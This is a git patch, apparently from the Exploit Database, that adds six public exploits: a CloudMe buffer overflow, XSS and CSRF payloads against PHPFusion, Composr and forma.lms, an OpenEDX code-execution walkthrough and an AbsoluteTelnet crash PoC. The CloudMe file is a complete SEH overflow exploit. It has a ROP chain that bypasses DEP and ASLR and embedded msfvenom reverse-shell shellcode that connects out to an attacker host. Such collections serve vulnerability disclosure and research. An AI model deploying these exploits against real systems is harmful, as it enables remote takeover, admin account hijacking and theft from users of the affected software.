From b6194a254f567e24836abc4e83fb2dbe9444d51a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 22 May 2020 05:01:54 +0000 Subject: [PATCH] DB: 2020-05-22 6 changes to exploits/shellcodes AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC) CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email) Composr CMS 10.0.30 - Persistent Cross-Site Scripting PHPFusion 9.03.50 - Persistent Cross-Site Scripting OpenEDX platform Ironwood 2.5 - Remote Code Execution --- exploits/multiple/webapps/48500.txt | 44 ++++++++++ exploits/php/webapps/48494.txt | 47 +++++++++++ exploits/php/webapps/48496.txt | 90 ++++++++++++++++++++ exploits/php/webapps/48497.txt | 78 +++++++++++++++++ exploits/windows/dos/48493.py | 30 +++++++ exploits/windows/local/48499.txt | 126 ++++++++++++++++++++++++++++ files_exploits.csv | 6 ++ 7 files changed, 421 insertions(+) create mode 100644 exploits/multiple/webapps/48500.txt create mode 100644 exploits/php/webapps/48494.txt create mode 100644 exploits/php/webapps/48496.txt create mode 100644 exploits/php/webapps/48497.txt create mode 100755 exploits/windows/dos/48493.py create mode 100644 exploits/windows/local/48499.txt diff --git a/exploits/multiple/webapps/48500.txt b/exploits/multiple/webapps/48500.txt new file mode 100644 index 000000000..23ae9f5a0 --- /dev/null +++ b/exploits/multiple/webapps/48500.txt @@ -0,0 +1,44 @@ +# Exploit Title: OpenEDX platform Ironwood 2.5 - Remote Code Execution +# Google Dork: N/A +# Date: 2020-05-20 +# Exploit Author: Daniel Monzón (stark0de) +# Vendor Homepage: https://open.edx.org/ +# Software Link: https://github.com/edx/edx-platform +# Version: Ironwood 2.5 +# Tested on: Debian x64 +# CVE : CVE-2020-13144 + +CVE ID: CVE-2020-13144 + +OpenEDX Platform Ironwood version 2.5 suffers from a RCE vulnerability when the use of CodeJail (https://github.com/edx/codejail) is not enforced + +This is an authenticated vulnerability, so you need to register an account, go to /edx-studio + +Then Create New course > New section > New subsection > New unit > Add new component > Problem button > Advanced tab > Custom Python evaluated code + +Once here we just need to edit the problem and introduce a payload such as: + + + + + +

Problem text

+ +
+ + + + +
+

Solution or Explanation Heading

+

Solution or explanation text

+
+ + + +And click Submit, and you will execute commands in the machine \ No newline at end of file diff --git a/exploits/php/webapps/48494.txt b/exploits/php/webapps/48494.txt new file mode 100644 index 000000000..7b6598a0b --- /dev/null +++ b/exploits/php/webapps/48494.txt @@ -0,0 +1,47 @@ +# Exploit Title: forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email) +# Date: 2020-05-21 +# Exploit Author: Daniel Ortiz +# Vendor Homepage: https://sourceforge.net/projects/forma/ +# Tested on: XAMPP for Linux 64bit 5.6.40-0 + + +## 1 - Description + +- Vulnerable form: Edit Profile +- Details: The validation of the CSRF token depends on request method. Changing the request method from POST to GET the token validation is omitted by the backend. +- Privileges: It requires admin privileges to change the admin email. +- Location: Admin Area >user profile > Edit form +- Endopoint: /formalms/appCore/index.php?r=lms/profile/show&ap=saveinfo + + +## 2 -Triggering the Vulnerability + +To trigger this vulnerability the admin user must log in to the system. + +1) Setup a HTTP server on the attacker machine, e.g: python -m SimpleHTTPServer 9090 +2) In the attacker machine create a file with this content: + +[+] payload.js + +var target = document.location.host; +var params = "r=lms/profile/show&ap=saveinfo&authentic_request=&up_lastname=&up_firstname=&up_email=hacked@admin.com&user_preference[ui.language]=0&up_signature=&save=Save+changes"; + +function pwnEmail(){ + + var xhr = new XMLHttpRequest(); + xhr.open("GET", "http://" + target + "/formalms/appLms/index.php?"+params, true); + xhr.send(null); + +} + +pwnEmail(); + +3) Edit a course and in the description field put this payload: + + + +The variable "name" it is not sanitized, later, if some user visit the +"Zone editor" area, the XSS is executed, in the response you can view: + +" /> + +V. BUSINESS IMPACT +------------------------- +An attacker can execute arbitrary HTML or Javascript code in a targeted +user's browser, this can leverage to steal sensitive information as user +credentials, personal data, etc. + +VI. SYSTEMS AFFECTED +------------------------- +Composr CMS <= 10.0.30 + +VII. SOLUTION +------------------------- +Disable until a fix is available. + +VIII. REFERENCES +------------------------- +https://compo.sr/ + +IX. CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +February 06, 2020 1: Initial release +May 21, 2020 2: Last revision + +XI. DISCLOSURE TIMELINE +------------------------- +February 06, 2020 1: Vulnerability acquired by Manuel Garcia Cardenas +February 06, 2020 2: Send to vendor +April 06, 2020 3: New request, vendor doesn't answer. +May 21, 2020 4: Sent to lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester \ No newline at end of file diff --git a/exploits/php/webapps/48497.txt b/exploits/php/webapps/48497.txt new file mode 100644 index 000000000..acad20b77 --- /dev/null +++ b/exploits/php/webapps/48497.txt @@ -0,0 +1,78 @@ +# Exploit Title: PHPFusion 9.03.50 - Persistent Cross-Site Scripting +# Date: 2020-05-20 +# Exploit Author: coiffeur +# Vendor Homepage: https://www.php-fusion.co.uk/home.php +# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php +# Version: v9.03.50 + +## How? + +When creating a thread or editing one of his messages with HTML content, it turns out that the injected characters are correctly escaped as it can be seen when I tried here to fuzz the message field with the string `i<3"'ivoire`. + +https://therealcoiffeur.github.io/captures/c5_1.png + +https://therealcoiffeur.github.io/captures/c5_2.png + +https://therealcoiffeur.github.io/captures/c5_3.png + +It's when I became interested in the print feature that things turned out to be interesting. Indeed, the print function allows you to simplify the page as much as possible so that it contains only text. So the print function returns all messages in text format so that the content of a thread can be easily printed (in order to generate this result it is necessary to click on the button circled in blue in figure 3). + +![alt text](../captures/c5_4.png "Figure 5: Injection of HTML character (part 3)") + +![alt text](../captures/c5_5.png "Figure 6: Injection of HTML character (part 3)") + +Once the page is generated by the print functionality we realize by analyzing the body of the server response, that our characters are no longer sanitized. + +Now we just have to create a message that will allow us to execute JavaScript by replacing the contents of the previous message with: + +```html + +``` + +https://therealcoiffeur.github.io/captures/c5_4.png + +https://therealcoiffeur.github.io/captures/c5_5.png + +## Why? + +The route requested to generate this result is the route \/print.php?type=F&item_id=1&rowstart=0. It is thus page \/print.php which is called, with the following parameters: + +``` +$_GET array (size=3) + 'type' => string 'F' (length=1) + 'item_id' => string '1' (length=1) + 'rowstart' => string '0' (length=1) +``` + +File: \/print.php +```php + +... + +case "F": + ... + + echo parse_textarea($data['post_message']); + + ... + +``` + + +File: \/includes/core_functions_include.php +```php +function parse_textarea($text, $smileys = TRUE, $bbcode = TRUE, $decode = TRUE, $default_image_folder = IMAGES, $add_line_breaks = FALSE, $descript = TRUE) { + $text = $decode == TRUE ? html_entity_decode(stripslashes($text), ENT_QUOTES, fusion_get_locale('charset')) : $text; + $text = $decode == TRUE ? html_entity_decode($text, ENT_QUOTES, fusion_get_locale('charset')) : $text; // decode for double encoding. + $text = !empty($default_image_folder) ? parse_imageDir($text, $default_image_folder) : $text; + $text = $smileys == TRUE ? parsesmileys($text) : $text; + $text = $bbcode == TRUE ? parseubb($text) : $text; + $text = fusion_parse_user($text); + $text = $add_line_breaks ? nl2br($text) : $text; + $text = $descript == TRUE ? descript($text) : $text; + + return (string)$text; +} +``` + +As you can see by reading the function code of `parse_textarea()`, the text is not sanitized, which leads to the Stored XSS. \ No newline at end of file diff --git a/exploits/windows/dos/48493.py b/exploits/windows/dos/48493.py new file mode 100755 index 000000000..22a9e243e --- /dev/null +++ b/exploits/windows/dos/48493.py @@ -0,0 +1,30 @@ +# Exploit Title: AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC) +# Discovered by: Xenofon Vassilakopoulos +# Discovered Date: 2020-05-21 +# Vendor Homepage: https://www.celestialsoftware.net/ +# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.21.exe +# Tested Version: 11.21 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 7 Professional x86 SP1 + +# Description: AbsoluteTelnet 11.21 - 'SHA2/Username' and 'Send Error Report' Denial of Service (PoC) + +# Steps to reproduce: +# 1. - Run python script +# 2. - Open absolutetelnet.txt and copy content to clipboard +# 3. - Open AbsoluteTelnet 11.21 +# 4. - Select "new connection file -> Connection -> SSH2" +# 5. - Paste the contents at the field "Authentication -> Username" +# 6. - press "ok" button +# 7. - Crashed +# 8. - Reopen AbsoluteTelnet 11.21 +# 9. - A new window will appear that prompts you to send an error report +# 10.- Open absolutetelnet.txt and copy content to clipboard +# 11.- Paste the contents at the field "Your Email Address (optional)" +# 12.- press "Send Error Report" button +# 13.- Crashed + +buf = "\x41" * 1000 +f = open ("absolutetelnet.txt", "w") +f.write(buf) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48499.txt b/exploits/windows/local/48499.txt new file mode 100644 index 000000000..95fdd109b --- /dev/null +++ b/exploits/windows/local/48499.txt @@ -0,0 +1,126 @@ +# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (SEH,DEP,ASLR) +# Date: 2020-05-20 +# Exploit Author: Xenofon Vassilakopoulos +# Vendor Homepage: https://www.cloudme.com/en +# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe +# Version: CloudMe 1.11.2 +# Tested on: Windows 7 Professional x86 SP1 + +# Steps to reproduce: +# 1. On your local machine start the CloudMe service. +# 2. change the reverse tcp shellcode using the IP and Port of your host using the following command +# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "\x00\x0d\x0a" -f python +# 3. Run the python script. + + +import struct +import socket + +target = "127.0.0.1" + +######################################################################## + +# Get kernel32 address from the stack +# 0022ff8c 77883c45 kernel32!BaseThreadInitThunk+0xe + +rop = struct.pack('L',0x699012c9) # POP EBP # RETN [Qt5Network.dll] +rop+= struct.pack('L',0x0385FF88) # Offset +rop+= struct.pack('L',0x68a9559e) # XCHG EAX,EBP # RETN [Qt5Core.dll] +rop+= struct.pack('L',0x68ae4fe3) # POP ECX # RETN [Qt5Core.dll] +rop+= struct.pack('L',0x0362fffc) # Offset +rop+= struct.pack('L',0x68ad422b) # SUB EAX,ECX # RETN [Qt5Core.dll] +rop+= struct.pack('L',0x68ae8a22) # MOV EAX,DWORD PTR [EAX] # RETN [Qt5Core.dll] + +# Calculate VirtualProtect relative to the leaked kernel32 address + +rop+= struct.pack('L',0x68a812c9) # POP EBP # RETN [Qt5Core.dll] +rop+= struct.pack('L',0xfffae493) # Offset +rop+= struct.pack('L',0x61ba8137) # ADD EAX,EBP # RETN [Qt5Gui.dll] + +######################################################################## + +# Setup VirtualProtect + +# edi +rop+= struct.pack('L',0x6d9c23ab) # POP EDI # RETN [Qt5Sql.dll] +rop+= struct.pack('L',0x6d9c1011) # RETN (ROP NOP) [Qt5Sql.dll] + +# esi +rop+= struct.pack('L',0x61b63b3c) # XCHG EAX, ESI # RETN # ptr to virtualprotect + +# edx +rop+= struct.pack('L',0x68d327ff) # POP EAX # POP ECX # RETN [Qt5Core.dll] +rop+= struct.pack('L',0xffffffc0) # Value to negate, will become 0x00000040 +rop+= struct.pack('L',0x41414141) # Filler +rop+= struct.pack('L',0x68cef5b2) # NEG EAX # RETN [Qt5Core.dll] +rop+= struct.pack('L',0x68b1df17) # XCHG EAX,EDX # RETN [Qt5Core.dll] + +# ebx +rop+= struct.pack('L',0x68ae7ee3) # POP EAX # RETN [Qt5Core.dll] +rop+= struct.pack('L',0xfffffdff) # Value to negate, will become 0x00000201 +rop+= struct.pack('L',0x6d9e431a) # NEG EAX # RETN [Qt5Sql.dll] +rop+= struct.pack('L',0x68aad07c) # XCHG EAX,EBX # RETN [Qt5Core.dll] + +# ebp +rop+= struct.pack('L',0x6d9c12c9) # POP EBP # RETN [Qt5Sql.dll] +rop+= struct.pack('L',0x6d9c12c9) # skip 4 bytes + +# eax & ecx +rop+= struct.pack('L',0x6fe4dc57) # POP EAX # POP ECX # RETN [libstdc++-6.dll] +rop+= struct.pack('L',0x90909090) # NOP +rop+= struct.pack('L',0x68ee6b16) # &Writable location [Qt5Core.dll] + +# push registers to stack +rop+= struct.pack('L',0x68ef1b07) # PUSHAD # RETN [Qt5Core.dll] + +rop+= struct.pack('L',0x64b4d6cd) # JMP ESP [libwinpthread-1.dll] + + +#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.6 LPORT=443 EXITFUNC=thread -b "\x00\x0d\x0a" -f python +buf = b"" +buf += b"\xbf\xa4\x90\x9d\x67\xd9\xc7\xd9\x74\x24\xf4\x5a\x31" +buf += b"\xc9\xb1\x52\x31\x7a\x12\x83\xc2\x04\x03\xde\x9e\x7f" +buf += b"\x92\xe2\x77\xfd\x5d\x1a\x88\x62\xd7\xff\xb9\xa2\x83" +buf += b"\x74\xe9\x12\xc7\xd8\x06\xd8\x85\xc8\x9d\xac\x01\xff" +buf += b"\x16\x1a\x74\xce\xa7\x37\x44\x51\x24\x4a\x99\xb1\x15" +buf += b"\x85\xec\xb0\x52\xf8\x1d\xe0\x0b\x76\xb3\x14\x3f\xc2" +buf += b"\x08\x9f\x73\xc2\x08\x7c\xc3\xe5\x39\xd3\x5f\xbc\x99" +buf += b"\xd2\x8c\xb4\x93\xcc\xd1\xf1\x6a\x67\x21\x8d\x6c\xa1" +buf += b"\x7b\x6e\xc2\x8c\xb3\x9d\x1a\xc9\x74\x7e\x69\x23\x87" +buf += b"\x03\x6a\xf0\xf5\xdf\xff\xe2\x5e\xab\x58\xce\x5f\x78" +buf += b"\x3e\x85\x6c\x35\x34\xc1\x70\xc8\x99\x7a\x8c\x41\x1c" +buf += b"\xac\x04\x11\x3b\x68\x4c\xc1\x22\x29\x28\xa4\x5b\x29" +buf += b"\x93\x19\xfe\x22\x3e\x4d\x73\x69\x57\xa2\xbe\x91\xa7" +buf += b"\xac\xc9\xe2\x95\x73\x62\x6c\x96\xfc\xac\x6b\xd9\xd6" +buf += b"\x09\xe3\x24\xd9\x69\x2a\xe3\x8d\x39\x44\xc2\xad\xd1" +buf += b"\x94\xeb\x7b\x75\xc4\x43\xd4\x36\xb4\x23\x84\xde\xde" +buf += b"\xab\xfb\xff\xe1\x61\x94\x6a\x18\xe2\x5b\xc2\x23\xf4" +buf += b"\x33\x11\x23\xf9\x78\x9c\xc5\x93\x6e\xc9\x5e\x0c\x16" +buf += b"\x50\x14\xad\xd7\x4e\x51\xed\x5c\x7d\xa6\xa0\x94\x08" +buf += b"\xb4\x55\x55\x47\xe6\xf0\x6a\x7d\x8e\x9f\xf9\x1a\x4e" +buf += b"\xe9\xe1\xb4\x19\xbe\xd4\xcc\xcf\x52\x4e\x67\xed\xae" +buf += b"\x16\x40\xb5\x74\xeb\x4f\x34\xf8\x57\x74\x26\xc4\x58" +buf += b"\x30\x12\x98\x0e\xee\xcc\x5e\xf9\x40\xa6\x08\x56\x0b" +buf += b"\x2e\xcc\x94\x8c\x28\xd1\xf0\x7a\xd4\x60\xad\x3a\xeb" +buf += b"\x4d\x39\xcb\x94\xb3\xd9\x34\x4f\x70\xf9\xd6\x45\x8d" +buf += b"\x92\x4e\x0c\x2c\xff\x70\xfb\x73\x06\xf3\x09\x0c\xfd" +buf += b"\xeb\x78\x09\xb9\xab\x91\x63\xd2\x59\x95\xd0\xd3\x4b" + +########## + +junk1 = "\x41"*1604 + +nops = "\x90"*16 + +junk2 = "C"*(2236 - len(nops) - len(buf) - len(rop) - len(junk1)) + +seh = struct.pack('L',0x6998fb2e) # ADD ESP,76C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [Qt5Network.dll] + +payload = junk1 + rop + nops + buf + junk2 + seh + +try: + s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target,8888)) + s.send(payload) +except Exception as e: + print(sys.exc_value) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index dd4975b34..aa309a606 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6732,6 +6732,7 @@ id,file,description,date,author,type,platform,port 48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows, 48434,exploits/windows/dos/48434.py,"FlashGet 1.9.6 - Denial of Service (PoC)",2020-05-07,"Milad karimi",dos,windows, 48441,exploits/hardware/dos/48441.sh,"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)",2020-05-08,LiquidWorm,dos,hardware, +48493,exploits/windows/dos/48493.py,"AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)",2020-05-21,"Xenofon Vassilakopoulos",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -11074,6 +11075,7 @@ id,file,description,date,author,type,platform,port 48469,exploits/windows/local/48469.py,"Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)",2020-05-14,gurbanli,local,windows, 48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows, 48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos, +48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42722,3 +42724,7 @@ id,file,description,date,author,type,platform,port 48489,exploits/php/webapps/48489.txt,"NukeViet VMS 4.4.00 - Cross-Site Request Forgery (Change Admin Password)",2020-05-19,JEBARAJ,webapps,php, 48490,exploits/php/webapps/48490.txt,"Victor CMS 1.0 - Authenticated Arbitrary File Upload",2020-05-19,"Kishan Lal Choudhary",webapps,php, 48492,exploits/php/webapps/48492.py,"CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution",2020-05-20,"Wade Guest",webapps,php, +48494,exploits/php/webapps/48494.txt,"forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email)",2020-05-21,"Daniel Ortiz",webapps,php, +48496,exploits/php/webapps/48496.txt,"Composr CMS 10.0.30 - Persistent Cross-Site Scripting",2020-05-21,"Manuel García Cárdenas",webapps,php, +48497,exploits/php/webapps/48497.txt,"PHPFusion 9.03.50 - Persistent Cross-Site Scripting",2020-05-21,coiffeur,webapps,php, +48500,exploits/multiple/webapps/48500.txt,"OpenEDX platform Ironwood 2.5 - Remote Code Execution",2020-05-21,"Daniel Monzón",webapps,multiple,